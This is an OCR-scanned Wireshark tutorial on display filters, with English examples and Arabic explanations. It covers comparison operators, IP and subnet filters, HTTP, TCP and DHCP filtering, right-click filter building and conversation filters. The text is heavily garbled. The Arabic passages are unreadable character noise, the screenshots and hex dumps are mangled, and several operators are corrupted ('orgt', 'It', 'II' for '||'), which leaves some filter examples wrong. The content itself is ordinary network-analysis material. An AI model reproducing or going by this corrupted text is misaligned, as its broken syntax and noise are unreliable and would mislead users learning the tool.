.030974 
.012466 



■ Internet protocol version 4 P Src; ^4, 

■ Transn-i sslort control Protocol, src Por 
Hypertext Transfer Protocol 

GET / HTTP/l,l\r\n 
- [Expert info tchat/sequencO - GET / 



Request Method: GET 



Request URI 



Q t " HTTP F.^u«t mirths Ohtlp.rniucfl.nfKf KfldX 3 b»l« P*f JOt 6 Qiiplfycd: 10! Wirtrf l oad lime 0*0^ PjigM*: wMtttjrHQl 



(Use Auto-Complete to Build Display Filters) <J*j& jfita *U£ J^V 1 f 1 -^ 1 • 
http. 'M^ ^ . J^t ^iaU ^iL ciljUijjIjll qM http.request.method 

Iajj ^jJI jj^UII c5j2 l_a jjoia http. request. Aic .^aill l^j Iajj ^jl ^j^uJI ^pa^JI j ^aU^ij t(<iaij cilli La^j 




- ! Esjf «artn,„ Ck*r Apply 5h?v« 



gifr Jdtf ^iew Jp> Rapture &fu^re jUtEdks Teleptioi^ ^ols JnCerruls; fcjdp 

Biwaii ^ a * e s ^**A>?a IMaj ^ - 1 

PM« HWp.r*qu«H. 

h Ctp. ii c q wit f ij\ |_u n 

■h tt p. e eq utiL^WH n 



3 



&Bgi , Jfrfo . ■ 

s standard query OxStiaS A www.w 
IS Standard query response 0x9 baS 
IS Standard query 0x8920 aaAa wwi 
IS Standard query Gx&920 AAM ww 
0.003284 75,75.75,75 24^173,220 DNS Standard query response 0x6920 



< mi tdii Uj) tcp. tij *jiiJi lW^ .^a^i ^u^&v ^ ^jisiai jusyi sj^i ^i^i^i ^ *j 

cJJ^i jii^i ^-ia^ ^^jujj jjoj ^IjLujjjI jll t tcp. analysis. "M-^ li) .^-^11 TCP ^jju^ <— a jjuj tiljUijjl jll ^jli 

4gVii^ ^^inn ^Sl ^-ja^ j^a J\ Jk. jSjII c^I^j .^U3I JUJI ^ <*bVlj TCP lS^I^ ^ J&\j TCP 























at M w ^ B 9 X 0 £ 




^ *T il | 


<si ei «t ed a 




Firte* 








pf«i««<u, T CPear Apf^y S*v» 




1 


hiC-.-ir.a ► _lr : •.i_-.r.- i ri- i"ir 

it p .nfl im^pi .o e k_ rtt 






Standard query OK9baE A wvav.w 






■bi^i . j rut^t K . acic-5 _ f r j^rMt 
tt . * i . by* « _fl ■ gti t 
tc p . a ufyns . Ju p4»c*te_j q L 

tc p . a nn*j.i« . dv p4« -■ 1 a c k _fi wn 




S 


Standard query response Ox9baB 








s 


standard query OxS920 AAAA mm 




4 




s 


standard query 0x8920 aaaa wwi 




6 

1 7 

)s 




s 
p 

IS 

p 


Standard query response 0x15920 
42^79 > http [SVNj Seq=0 win=e: 
Standard qaiery response 0x^520 
http > 42179 tSYN p ACK] Seq^O ^ 
42379 ^ http [ACKJ Seq^l Ack^l 




"■a- 


t< p . j r>-:> P i- : .O: t 




- T> 






O.QOOS53 24.6.173. Z20 




.42.75 HTTP 


GET / HTTP/1.1 





https://www.facebook.com/tibea2004 



Display Filter Comparison Operators • 

1. == or eq 

Example: ip.src == 10.2.2.2 
Display all IPv4 traffic from 10.2.2.2 

2. != or ne 

Example: tcp.srcport != 80 

Display all TCP traffic from any port except port 80 

3. orgt 

Example: frame.time_relative > 1 

Display packets that arrived more than 1 second after the previous packet in the trace file 

4. < or It 

Example: tcp.window_size < 1460 

Display when the TCP receive window size is less than 1460 bytes 

5. >= or ge 

Example: dns.count.answers >= 10 

Display DNS response packets that contain at least 10 answers 

6. <= or It 
Example: ip.ttl < 10 

Display any packets that have less than 10 in the IP Time to live field 

7. contains 

Example: http contains "GET" 

Display all the HTTP client GET requests sent to HTTP server 
^jj <ji ^jjj lil tjliall L5 lc .TCP J] Vn i n^ l cjLLfkill s jfik ^ (comparison operators) ^ jlUI lW ^l^iuit 

.tcp.port == 80 tifc-J! lU^ 4-^UJI HTTP jj^l ^ 

.(Operator) lW-*-^! ls^-^ '^-^-^ Ait^l ^1 ^l^aJ V c±j| ;<ia j^i* 
ip.src==10.2.2.2 works the same as ip.src == 10.2.2.2 



(Use Expressions to Build Display Filters) u^j^l jdi f Expression Jl ^l^l^l • 

<aJaio ( . uLaj ^^joLjjj]! CjIj^VI -^j^j <^c- Expression jjll c3j* j^I '^ls^ l^I l^j 

-jjuj) 5-ajU3! <Jaii3l tills Jl JUliVlj L*%* ^ill J j£ jjjjJI jl (j-nlalll ^'^j 'Filter Expression ^Ljj J .Sjiilill 

.AaAlall Cjtatk^l ^ jj SMB <y->jH ^ c>j"SMB" c^Jtill J£JJ! J . JSaJ! 

. (comparison operators)^ lU^ AiL-^V J field existence filter H W^-^^l Relation j^l 
ill Jc J jlaJI ^ V a <>m^U .ai^ ^ill Jq^ 1] aAjslA] ^jill ,a§ ^Filter Expression s^-j o-* o*^' 

. smb.nt_status UU2 

o^^u ^jUj^ljll predefined value * STATUS_SUCCESSj Relation S =! smb.nt_status UjfcJ 
jSj <J ^1 ^jil ^ 6 != lU«1I U j^I .£^1 J) NT Status J ^1 ^ j 0x0 

jjl) jiill -L> ^ j*it 411^ ^ smb.nt_status != 0x0 j^^l j^l 4 jalj-a Jja jto 

. jj^JI ^ j^ill Apply 
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Kg =.nb-jDir IS"] jrc-spny 










j &m £drt Jtfw £o 










si » m m m 


a H X S 


<\ * * ^ ^ 




a $x m mmm& m \ 


i **** 






p [ Expression... 






I Vftresharfc Filter Expression - Profile: Default 



Value C Unsigned irsfl-egen. 4 bytes} 



".■>. SM - Ci«a Session Management 






is- present 


0*0 


5MB - SME (Server Menage hrrtocilj 






mm 




Winb.cmd - 3WB CsrmnafiJ 






!= 




stati>s_sik<:ess 


jwwib.ttansJ.Ornd - S*jbtomP**fld (SuftKOrYMner 






> 




&TATU5_WAJT_1 


jiwb-nd.fwiKlion - FijrvctK^ (F tf ivclicn for NT T 












smb.*«Ct ■ W^ird CourU &J£T} (Word Ccm?nL C 






;: 




STATu^.WAJT.3 


OTih.bcir - ByteCwntCKC} (ByreCcnwt, cot- 
tmb.r«pcnH_[D - Response to- (This packet is 








&TATlfi,WAJT.&3 


srfnb.twne - Time f -ram request CTwne between 










5TA.T U5_AB AfJM N E D_WAT 


j.rnb.respGtftteJn - Res-panic in (Tn* response 










STATLB.USIPLAK 


s.mb.cc-nCirtiHlrtrt_Co - CnsnlirviHdon To (7»»*S p 








<VTfiTI ft kfflUfl APr. ^ 


wnb.nr_statiw - NT 5t*tu* TNT Status coda) 












H*ib.frror_ctsjs - t«crCI*M [OOSErw Cms) 

> 1 ~ ' » 








" j -iqe [affstfcfenglh) 

! 1 



Filter jjll cij* H «j lSj^' ; ^Uaj *LijV c ^jJaljjaVI Lpa^l <sL^\ o^j^ 

j± jA\ j&k oiaU jjal t*Ui j (^5-^ jll cj! j^Vl -^j^ ^) Display Filter j j J^' j' (o^ j*^ Alki* jLuj ^ %± jJI) 

.^jjjl^JI jjIa ajjj] JUJI jJiij .4? o- 3 ^^ 



BJK if 

^ Finer 



P| Mib-jeiP"lOl,|KJus*$ 
File tdi[ )ftew Q,o l*pliPe &p&fa. |u&tki Tttphcij Jt4h Jrdernfil^ 



W \M * SS £ \ ^» * * ^ ^ 



Odp 

ffpj a q <a a 

Cf«f Apply 



•MoT" Time 


Source 




DestnuEir>ii 




Protocol 


Info 






1 0.000000 


192. 


168 


0.B8 192.168.0 






Standard 


query 


0x2518 SRV _ld 


3 0,000375 


192, 


1138 


0.90 102.163. G 


as 


DNS 


standard 


query 


response Ok 2 518 



3 

4 



0.000575 
0.000354 



19?,16S P 0 a 68 192,168,0,99 CLI>AP searCfiRequestW ,r -<R00T> n basei 
192. 0.99 192.163.0. S3 CLOAP SearchRtsEFltry<4> n <R0OT>"' sea? 



.OK ti> 



I Wireshjrk: Cisp^w/ Fitter - FVofile: vk^esrurkiai 



Display F*ej 
ith*f*iet j*dr Hl DChOS-15JtBtflGrI 5 
EtK«rnet e> 7 e OrfSTC >WP) 
(<h«rntt biCMhdr fH 

IP o--*r 

IP *d*« nWJi*S*a 

U&P port isn- t (nc< DNL.i. tfon t *jse := for this! 

TCPofUDPportMflO fHTTP-] 

HTTP 

Mo ARP arvd no QMS 

Ho*i-HTTP and flon-SMTP Icmffimi ISilfififll 



Firter "mm-fc 
Fitter Slriny 




j >t 4L ^UJI ^Uali V ^Ij ^ ajJ Ethernet and IP host .c^ 3 ^^^ lP 3 ^^ ^^^^^ Iji^ 
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_4_Ia jQ^ *\\ q^jxI] jJ^li <iLjaj Al jfruiJ <^<< «j jjaiJ tiL <j^aLaJI JJ^>^ I JJ^S (j^f^ 

fj\ Vjl <4? ^UJI dfilters * «M j*^ .(J^l ^ ^->^ j' 6 jSUIl uklj jj^UII AiUbV) 

. (Status Bar)^^ -^j^ i> oV^' ( y?^^ ^j*^' ^ . < S^ C - (Profile File) <-*L>*^l ^ 

About Wireshark t>j V-^j^ ^ helps <ija jfclW ^"Default" ^ j^Aj 

^ J uj^ ^ dfilters .Personal Configuration folder hyperlink ^V^l <ija Uj.a> I jfc jftil ^ Folders 
4^UJI Personal Configuration folder ^ cj|j]a±JI U oij ^1 4 (Profile File) ^j* 2 ^ Wi .. n lij .^kJI 

(J^l^lt (j-a .^tla d flLa <J^ c^*^ J Profile ^ ^1^1 j3 ^ cilUfc (jj^J A jjoj j .Profile ^> a\\ (JC- Cliaaj (jSlj 'tdj 

.dfilters LjLllJe. jk*ll 
(Filter Properly on HTTP Traffic) J***! HTTP ^ Sj^a j. 

tcp.port==xx (where xx denotes the HTTP port in use) 

TCP ^ fSj J^Jt jW^' • 

L yaj*l\ jjla (jjjinij UxS .ciljUijjl jll ^ <^uolj Jj-a^j c_ASa j www.wireshark.org ^ J^ajl j5l l^j^ c^^^ c aUll 

J£ 11a ^ j^l liA . Jtill J^Ji ^ ^ULL ^ill j^ill JjUj ^1 ^ jaJI J£ jll ^ cjl tcp.port==80 



Q| http 'MfCihark-downloadlOl-pKapng 








File Edit Wew £o £*ptyf< Anudyj;* 




lrttfcrri3l< Help 


€1 D 1 * 1 


& u m m m eiQxs 








FiKcn tec. port =.=50 




jj^j Expression,,, 


Clt*r Appiy -Save 




Source 



DtStirtatiftfi 



0 24,6.17 3,220 67.228.110,120 HTTP 703 



SMI 



TCP 



.41Q581000 67. 2 2&.110.12D 24.6.173. 22D 

0.420958000 67. 228.110.12^ ~~ 

0.472190000 24, 6 r 173. 220 j The top, port — ©Ofilter 

displays all our web browsing 
traffic as well as the TCP 
connection setup and 
management frames - NICE! 



60 http : 
HTTP/3 
25SS4 



: Frame 19: 70S bytes on wire 



0000 00 01 5c 31 bb cl d4 fi5 
0010 02 bl 11 70 40 00 80 06 
0020 78 65 3f 00 50 IS 5e 



id (56: ; 



e lb 6a d5 e7 a4 cf £a 18 nx- 



nxe?. P. a 



> FiFei "CMi j<e„fit«-p-capng'vhttp-^ire5harkdo^.,, PjcIw^: Displayed: Marked; 0... Profile; Default 



20 0,419561000 67, 228. 110. 1?0 24, 6,173. 220 

- ■ 



6iJ 



HTTP cjUUi^l jl j-lji t> c5j^ V ^jUijjl jJl .HTTP ^ j 'TCP u 1 ^j^j^ 1 j 31 J 

.TCP Vfril .a->1I jJ-j HTTP dissector ^ 

(TCP ACKs, FINs, RSTs, and the three-way TCP handshake are simply listed as TCP) 



jj^U L-±ui\ \a\\ jiilill j& 4<jLi^3l j 6 TCP cJ^^^ (jj*^^ c_ u£ lil 

JjSjSjjJI ^ ^ HTTP c> cr 131 fj^ 1 ^ 13*353 
.TCP ^ 5^ s^V TCP preference & ^ ^ c^l jlL! 12 ^ ^ tij 
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fife fccf* V£«*wr So Rapture Ana^t StatiUKrs T^lrphony Taoh tnC™^^ Hrip 

g, m ^ ^ # B 0) i : B ":a <± *> + G^QtaEiBS* 

Fifteft http Expression... Cleir Apply Save 



0 . 000000 24.6.173.220 67 _ 2 2E . 110 _ 120 HTTP 



6 0.044 344 67 . 22S * 110 . 120 24.6-17 3.220 

7 0.001257 67.228,110.120 24,6.173.220 
S 0.000004 67.22S.210.120 24.6.17 3.2 20 
20 0.034065 67 . 22S . 110 . 120 24.6.17 3.2 20 
11 0.000003 67.22S.110.120 24.6.17 3.220 



HTTP HTTP /I. 1 200 OK 

HTTP continuation or r 

HTTP Continuation or r 

HTTP Continuation or r 

HTTP continuation or r - 



Frame 4: 66S bytes on wire CS 344 bits), 66S bytes captured CS 34-* 
Ethernet II, Src: Hev/I ett -„a7 : b"f : a3 Cd4 : 8 5 : 64 : a7 : bf : a3) , Dst : C* 
internet Protocol version 4 S src: 24.6.17 3.220 (24 . 6 . 273 . 220) , i\m 
Transmission control Protocol, Src Port: £5918 C2S91S) , Dst Fori 
Hypertext Tr an sferj* r otocol . H^^^^^^^^H - 



0000 00 01 5c 31 b The Http filter displays L Qa QQ 45 QQ 
0010 02 Se 11 67 4 13,353 packet* J6 ad dc 4 3 e4 

0020 6e 7S 65 3e,o L y , ., ^ ^ J a 62 46 SO IS nxe>.PC. ■ 

<fr gf F\\*t -C-Xitstts-X... Fac kW*. placed; 1 3353 Mi(k;i 0 Lead time: 0;00.5gj -Pw»4Vlw wHr gOi»rkl0S 



Ai. 



.http liA e I^L,U TCP <> UlJ^I ^ jjij J 

a£ di^ll ^jjal jjaVI jflill liA jjj^j ^ jiull .http J* HTTP JJJ-*U ^ ^U^' «-*u£U 

iiiall ^ axuxj HTTP 
J^u V ^ DHCP j^liUJjjJau 4. 

ci j*j J iia .BOOTP c> ^ DHCP ^ j^VI ujP IPv4 ^ ^ DHCP c> 0*&** 



H dhcp-sei^erdiscove-rylGLpcapiMj 
file £*t We* So £*ptui* £n?tyw Satisfies- Teifcpheft£ Jooli internals Help 



Mo. TjiTi* 

2 0.0149200" 

3 25.040121' 

4 25.050S6&- 



\ * * « ¥ a dJQ] ^ Q Gt H 

Expression,.. Ctear Apply' Save 
D<atirtitiofl Pfflloeot Ltiiglh ]nf* 



342 DHCP 




The display fitter will never work if 
Wire shark's error-detection changes 
this field background to red. 



HCP 


342 


DHCP T 


hep 


342 


DHCP i 



- Frame 1: 342 bytes on wire (2736 bits), 34? bytes captured (273< : 



oooo ff f f f f ff t f ~W 

0010 01 48 IS 49 QO 00 
0020 ff ff 00 44 00 43 


00 18 
80 1 ] 

01 34 


de db 27 d? OS 00 4S 00 
&2 50 CO a8 00 64 ff ff 
43 82 01 01 m 00 d2 04 


■ H.L,., a 




iit 






@ i^f faivalidlfitter: "dhep" is neithw afield 


nor j prot... 


Packets: A Dh-played: 4 Marked: 0 Lcad-tim... 


Profile: Default 



(Bootstrap Protocol) BOOTP ^ DHCP lUj V j^ill Ija ^^CP f> J^jj^i J t> ^ J 31 c> 

dhcpv6 ^i^i^l t^lSi tilj^Qj cDHCPv6 jjj^^ ^ ^) .bootp gr* lP 3 j* 3 ^ ^j^ > ^ 1 3 *j > ^ 1 lit 

(BOOTP DHCPv6 oV) 

AaC 4Sjnilt jl c^jUaJl ^ ^ J-4^-d cIP (jl UUIujI jla jj^i ^jjjhl i^. 

C^J^ 1 (IP address display filters) IP o^j^ J 15 ^ o^ 1 jj^^ ^ J^j^ lP 3 ^^ j 15 ^ 

.(Subnet) ^j^^ ^f^t jl 

ipv6.addr j 'ipv6.host 'ipv6.dst < ipv6.srcj IPv4 ip.addrj 'ip.host 'ip.dst 'ip.src Jj^Jl <^^i ^^Luj lJj^ 
J 'ipv6.src 'ip.dst <ip.src c^ 1 ^ ^ ^ J>^ ^ IP u>j^ ^ JA\ <j! i^V . IPv6 jj^ 

•f ^j 15 ^ipv6.addr jip.addr jipv6.host j ip.host Jj^Jl <^^1 .ipv6.dst 
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( *u*a fjj fj\ l^iaa. jj ^ ^1 IPv6 ul?^ J IPv4 ojj^ c> ipv6 host filters j ip.host J 

ip.addr==[address] .IPv4/IPv6 destination u*j^ jl IPv4/IPv6 source u'j^ 
lWI J IPv4/IPv6 source address JkJI t> l£ ^ IPv4/IPv6 ojj^ t> ipv6.addr==[address]j 

.IPv4/IPv6 destination address 

Example: ip.addr==10.3.1.1 
Display frames that have 10.3.1.1 in the IP source address field or the IP destination address field 

Example: !ip.addr==10.3.1.1 
Display all frames except frames that have 10.3.1.1 in the IP source address field or 10.3.1.1 in the IP 
destination address field 

- Example: ipv6.addr==2406:da00:ff00::6bl6:f02d 
Display all frames to or from 2406:da00:ff00::6bl6:f02d 

Example: ip.src==10.3.1.1 
Display traffic from 10.3.1.1 

Example: ip.dst==10.3.1.1 
Display traffic to 10.3.1.1 

Example: ip.host==www.wireshark.org[34] 
Display traffic to or from the IP address that resolves to www.wireshark.org 

(range of address) l^j^I <> <> j' <J\ JJJ^ • 

ijj^ ? jaJI cp && (^laLJ! Jx»UJIj > j! < <j J1A\ JJjc ipv6.addr J ip.addr ^l^lual t*LLaj 

- Example: ip.addr > 10.3.0.1 && ip.addr < 10.3.0.5 
Display traffic to or from 10.3.0.2, 10.3.0.3 or 10.3.0.4 

- Example: (ip.addr >= 10.3.0.1 && ip.addr <= 10.3.0.6) && !ip.addr==10.3.0.3 

Display traffic to or from 10.3.0.1, 10.3.0.2, 10.3.0.4, 10.3.0.5 or 10.3.0.6-the IP address 10.3.0.3 is 
excluded from the range specified 

- Example: ipv6.addr >= fe80:: && ipv6.addr < fecO:: 

Display traffic to or from IPv6 addresses beginning with 0xfe80 thorough OxfecO 

(IP Subnet) "<p jM <> ji J>\ JJ>^ ^J* • 
liA ^^kiay .ip.addr J^l ^ (Classless Interdomain Routing) CIDR <^ jl\ i£+s&\ <A&u 

,JP (jl jie (j» e-j^ CjUill J-lc. jjjoij (^^Ij 4a^.V(\) aIjLh Aiaj^ij kc jfLo IP <jl jic- J^imjjll 

- Example: ip.addr==10.3.0.0/16 

Display traffic that contains an IP address starting with 10.3 in the source IP address field or destination IP 
address field 

- Example: ip.addr==10.3.0.0/16 && !ip.addr==10.3.1.1 

Display traffic that contains an IP address starting with 10.3 in the source IP address field or destination IP 
address field except 10.3.1.1 

- Example: !ip.addr==10.3.0.0/16 && !ip.addr==10.2.0.0/16 

Display all traffic except traffic that contains an IP address starting with 10.3 or 10.2 in the source IP 
address field or destination IP address field 

Quickly Filter on a Field in a Packet *t 

J ckj^ JjjL ^ L^ii cj\ '(particular characteristic) o^L^. ^ jjj^ Cf- 

Cy^\ ji^l ^Ia^j ujLj jl i Apply tjj^ ^ j o^j*^ 4j> Cy* ^ji^ • JJ > ^ j^ 1 ^ 



jl (jjall j^la (JfSajj Lib ^ill) Apply as Filter H j 4jj^aU> J JL*> ^1 jjja c>jVI <jjj jUJI jJj jiJI A'&a) 

.(^iiill t_aL UjUIj <3fkiJ V j 6^ ji^ 4lSaix» ^ jSlill <*-^ c^^l) Prepare a Filter 

Work Quickly-Use Right-Click I Apply as Filter - 
GET o-sVl j^lj HTTP ^1 ^ '8 jUaVI J^US ^>JI J^US ^ .^JUll JLill ^ < Jli*ll ^ 
^5 £y*j Apply as Filter <j^f^ Ljikl .(/) dujiiVI ajjoujjII 4^q>^l J^^j ^jj ^^kiu^ c^lj URI 

.Selected 



File EHa Q*i C+pr,*f* fir 

u urn mm b * 



Btpwid All 



Connie tvii^i Fiftff 
follow TCP Str«n-. 



□ m © ^ S 



C<5*jy 



Mo. T-vve S*ii'(t 

« 0,062*71 24,6.17 

«aa I 

■ Frame 8: 603 bytes ^ w.ta ^eisai P*se 
.Ethernet II. Src: " ^ ^ f^R **™ 
k internet Protocol v 

■ Transmission CO^tro frcf qcci Pr<**r«i^ 
Hypertext Transfer 

GET / HTTP/1- lV\i n Detod ^ - 
- [Expert info CO" * 

Request Method:,^, s^k^ N flmt 

' ~p to £cur«pf>fi#ng Prefect 



^_ r f :-t c 
_ o[ not Selected 

nTP 603 GET / HTTP/1 r l 



>3 bytes captured C4S24 bits) on in- 
>:64:a7 :t>f :*3) . Dst: cadant_31 : bb : c: 
I., 220 C24, 6,173. 220}, D£t: 199,181.7 
► L9941 (19941), Dst Port: http C&CO p 





p/l.l\r\n] 



0030 40 29 14 d2 00 00 47 45 54 20 £ij 20 4S 54 54 50 fi) GE T N HTTP 

0040 2f 31 2e 31 Od Qa 41 63 63 6S 70 74 3a 20 61 70 /l.L.Ac capt: ap 

0050 70 6c 69 63 61 74 69 6f 6e 2f 73 2d 6d 7 3 2d 61 plicatio n/x-ms-a 

0060 70 70 6c 69 63 61 ?4 69 6f 6e 2c 20 69 6d 61 67 pplicati on, imao 

O V HTTP ftt4v«(-USJ ffctt^eqy... P«ttlt. 49W C.5pi*i-«): -t»0 K.1#fkttf: 0 Le*J (,m*:0fla53S Pr^.lt-- Def*vH 



o^j^ Uj^ -t^' ci^A^ j (http.request.uri=='V v ) ^jLoJI lP 3 ^^ ^j^j^^ j^^ 



Eii« £«i ±*m*t Stsi'nxi Ititphv^ icois. h«"p 

Hawaii © ■ S HP) <^t Q ^ □ » a » ^ B 

FUt« MifS.«qife4 , Lun-= T [*] £sp«ssic»„. Crttr Appty Sav* 
Ha. Tn™ Source E>estieiation ProtociH Leisgth Bnfo 



S 0.062371000 24. 6. 173. 2 20 199. 181. 132. 2 HTTP 603 GET / HTTP/1.1 



17 0.197&17000 24.6.17 3.220 63. 71. 216 . 176 HTTP 602 GET / HTTP/1.1 



e Frame 8: 603 bytes on wire (46 24 bits), 603 bytes captured (4S24 



U liA j . jjlflll Jj£ not ^ Uyu ( Liaj 4iLaUJ t^^xJl ^ HTTP C> t) 6 ^ ^IxjIojI s^jj lil 

^ojVI u^jUJI jJj (exclusion filter) ^ jM\ tiA ^Lij] Ljaji .(exclusion filter) lW^ 

.Not Selected ^ Apply as Filter ^Ij^VI ^i^ll GET 

not http.requoturi =- 7" 



Be Creative with Right-Click I Prepare a Filter - 

^ji ^jjj el n£ Lajj tcJlixJI cJ;^ ^^^ic .^jjiiaj ^jj ^ji JjS 4 auji gall -ja-viU j| jjla ^jjj U»^jc Prepare a filter ^l«^Luit 
J^k Prepare a Filter c>j lwVi ^jUJI j jj jiilU ^ . JPG^^ J j > ^^ W^ 3 ^ o- 21 ^ 1 ^] 

.Selected ^ c>jURI 

(i^aa V 4_&3 4^^x11 jj^la Ailai^ ^ http.request.uri== ? 7prod/scripts/mbox.js M ^ ^jUjjIjII 

^ia^ U£ .APPLY tija j^j ^ http.request.uri contains "jpg" ■ JJ^^ 
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313 0,000000 24.6,173.220 
16 O.CJ38637 24 .6. 173 . 220 
402 O. 32 3054 24 . 6 . 173 . 220 



^ «> IF [Ml 13 <2t EZJ Bl SI m 3S 

[ •* | Exp«*sio*u,. C»m* ftjipv S*w* 

1S4 .®4 ,222?\S HTTP 435 GET /prod/ass 

184 .84 .222 .4\ HTTP 490 GET /prod/ass 

184 .34 .222 .4S\ HTTP 492 GET /prod/ass 



fits/ 

*»ts/ 

ets/ 



- Frame 313: 4 85 byres on wire C38SO bi 
e Ethernet II, src: Hew1ett-_a7: bf : a3 (d 

■ Internet Protocol version 4 t Src; 24 , *5 

■ Transmission control Protocol r src For 
Hypertext Transfer Protocol 

GET /p r od/a. ssets /boj_v2 /bg_f r ont page_r e« 
[Expert info (chat/sequence) : GET /pr 
[Me s sage : GET /p rod/as s e t s /bg_v 2 / b g_ 
[Severity level ; Chat] 
[Gr ou p : s eq uence] 
Request Method; GET 



485 bytes captured OSSO bi 
3S :64 :a7 :bf :a3> , ost : cadant. 
,73.220 (24 « 6.17 3. 22Q> . Ost; 1 
19947 C19947} , Dst Port: htt = 



| 3 pg HTTP/ 1 . l\r\n 

'/asset sybg„v2/bg_frorttpage 
Frontp ag-e_re d . j p g HTTP /I , l\r 



O HTTP R*qu«t-L«l (Mtpjcqy.wtjwrfi. 39 tryt« 



pKkef 5 :i9CC n,ifil«;td JJ h.1.kr*<* 0 Load Piol=:r- :^-h.vl:2u] 



Right-Click Again to use the M ... M Filter Enhancements 

j^a Cjljlrk <xjjI ^jj lJj^ tdjli 6 Prepare a Filter j Apply as Filter iW^ j j*^ ^ 
jjlil! ^ ^illj http.request.uri M Jl V < Jl^ll li* ^ .JUll JiUI ^ jA L£ j ^Ij ^jJ 

. go.espn.comc> £^ u' ^ lp^j'JPG" 



I htJCp-eip'ilOl.pcapng 



Fife £dft Br* 

et m m ft m 






Statist; 














No. 


Tifrte 










313 


0.000000 


24.6 


.173. 


220 


184. 


326 


O, 038637 


24.6 


,173* 


220 


1S4. 


402 


0. 323054 


24.6 


.173. 


220 


184. 



m Tin* rnterne** Hco 

Ce-OipaeAll 

Apply H 
P-rep-are-n Fitt-sr 



SB 



GET /prod/asset5/bg_v2/i 
etis/bg_v2/l 

fts/frontpn - 



Frame 313; 4S5 bytes on v.i re C 

■ Et h e met II, £r c : Hev^l ett -_a7 : 1 

■ internet Protocol version 4 „ s 

■ Transmissi on Control Protocol , 
Hypertext Transfer Protocol **" 

GET /p rod/as set £/bg_v2/bg_f rc - 
■ [Expert info tchat /sequence] 
Request Method: GET 
Request URI: /p rod/a sset s/bi 
R.e qu e st Ve rsion: HTTP /l . 1 
Accept: */*\r\n 

— wm 



Folio* TCP Sa/*Jnft 

Fc-ilc-iv LT* ^-ritJOTi 

Copy 

txp-ort Selected Pickrt BjIm.., 
WW Prc«ocDl P*g« 
Filter Firfd Acftnna 
P-reccnccJ hCdp 



Accept-Langunge : en-US' 



►\r^n JI 



d - jnd S<Hct< J . 

0 bits> on - 
ant_31 : bb 
t : 134 r S4 
http CS0} 

l\r\n 

tg_v2/bg_f r ontpage_r ed . j p 
-IPS 



□st Port: 



HTTP Erft, *« iMt?. Pjcfc*tL i&M O.splif **. 22 Miifcrf Q Loid Urn*. 0.00.3 79 



.jlSJI ^ tcp.port==80 J*iiU UjJ jl£ lij JdJ& ^aL^VI <ii jll fl.wU ^ ^ ^Ull 

- Right-click on Request Method: GET and choose Selected 

Filter created: http.request.method == "GET" 

This will replace the current display filter and display all HTTP packets that contain the GET request method. 

- Right-click on Request Method: GET and choose Not Selected 

Filter created: ! (http.request.method == "GET") 

This will replace the current display filter and display any packets except HTTP packets that contain the 
HTTP GET request method. 

Right-click on Request Method: GET and choose ... and Selected 
Filter created: (tcp.port==80) && (http.request.method == "GET") 
This will display packets to or from port 80 that contain the HTTP GET request method. 

- Right-click on Request Method: GET and choose ... or Selected 
Filter created: (tcp.port==80) II (http.request.method == "GET") 

This will display packets to or from port 80 as well as any HTTP packets that contain the GET request 
method. For example, if your HTTP traffic uses port 81, you will still see all the HTTP GET requests from 
that traffic. 

Right-click on Request Method: GET and choose ... and Not Selected 

Filter created: (tcp.port==80) && ! (http.request.method == "GET") 
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This will display all traffic to or from port 80, but not any HTTP packets on that port that contain the GET 
request method. 

- Right-click on IP Source Address 10.2.2.2 and choose ... or Not Selected 

Filter created: (tcp.port==80) II !(ip.src==10.2.2.2) 

This will display packets to or from port 80 or any traffic that is not from 10.2.2.2 

Filter on a Single TCP or UDP Conversation ± 
IiLujj conversation ."conversation" ^ t^UJI 4_iLc j JjLuJI o£ lP^jVI 

c aj£ <ijjt-<J j .conversation o^^Si £f"^ c ^ lSj^j y^-c- .^Lkll 4jUr. j cJ^*-^ l3jj^ m\a\\ ^ISjI j IP (jjjUc 

.^UVI 4c- jju^ Jjia^ll 4_iLc c&j*j yi L$j conversation * jSla j ^j^j <c jjuij 
. ^iiill ud* ^> s^lj UDPj> TCP W conversation jij^V cij^ yr* M 31 ' H 1 ^ 1 
P >II **A5 ^ TCP J UDP P > <iji l^VI o-jUl jjt J^h d& UDP/TCP conversation £»>^V -1 

.[TCPIUDP] fS Conversation Filter J^l fS ,>j 
P >II ^li ^ TCP J UDP e> <ij* lwVi o-jUI jj^ j^W ^ UDP/TCP conversation -2 

Follow [TCPIUDP] Streamjl^l fS ,>j 
.Conversations j^J ^ i>j Statistics <ija t> ^U^W i> conversation jrlj^V -3 

.(TCP o^j ^ Stream index number TCP conversation -4 

Use Right-Click to Filter on a Conversation • 



| http.-«pniO;Lpcapr*g 



tile Edfi ID** So £>jH'j*f fifljtya* ifa&staa T-rieflfctsft^ Irak Iflltmsls- H*rp 



SOfi 3.247440 24.6.173*2; 



S09 

Sll 
512 
513 



3. 247628 

a. 24766* 

. 24?91* 
.247521 
. 24S092 
. 24S094 



24.6.173, 220^- 
24,6.173.220 
24.6.173.220 
24.5.173. 220 
184. 84. 222 . 48 
184-84. 222. 4S 

3 A e. 17^ 



* « T it H@ <st €^ n a 



76 GET /prod/assets /tabs -A- 



. Frame 508: 476 bytes on w 
► Ethernet ir p Src: Hewlett 
* internet Protocol vers ton 
s Transmis sion control Protj 
Hypertext Transfer Protoc- 
GET /prod/assets/tabs-A- 



r ktark P*cfce9 (toygkv 

[graft *"«ktt ilcggic) 

Sei : -> 3ef'EicntE "V^c 
T.wfShJt... 

Fditdjr AtSd P^cfctf CcmrvKint... 

i-i. ■: • +t F ■•■'<■ 
Prepare* Filter 

Cor™*«#(i*n Frrter 
Cak&riH: 'GanvcrsfltKin 

SC7P 

FcWow TCP Str earn 



1E6 CET /photo/2012/0a06/ncf_ 
74 Standard query 0xd^t}2 
74 Standard query 0xe053 fij 
165 GET /ph&tt>/20l2/OlO?/HCf. 
514 [TCP segment of a reassei 
514 [TCP segment of a reasser 

*IA nOCi.il ^ ht1-n rAr¥-1 " 



bits) on - 
adant_31 : bb : c: ^ 




Copy 



0000 00 01 5c 31 bb cl d4 

0Q10 01 ce 62 ei 40 00 80 a 

0020 de 30 4d fl 00 50 ftf « P^wrt- 

00 30 40 25 5e 23 00 00 47 



She* P + cfc<4 ift r.!^ ^HirwJowy. 



5 00 
8 54 
0 18 
4 2f 
- 



O *'* ftt *r- "C:\tr*i*T.-e-;*piv3t«Vhh... P*cfc*ti- +900 Oupl*,** -4*50 M*fk*4: <l LeifJ bf**; 0<H 589 



. .b,* t 

.OH, , P, . ,0. 4u<JP. 
ft)AC, -GE T /prod/ 



Use Right-Click to Follow a Stream 



0 http-t^nini.pt.apr^ 

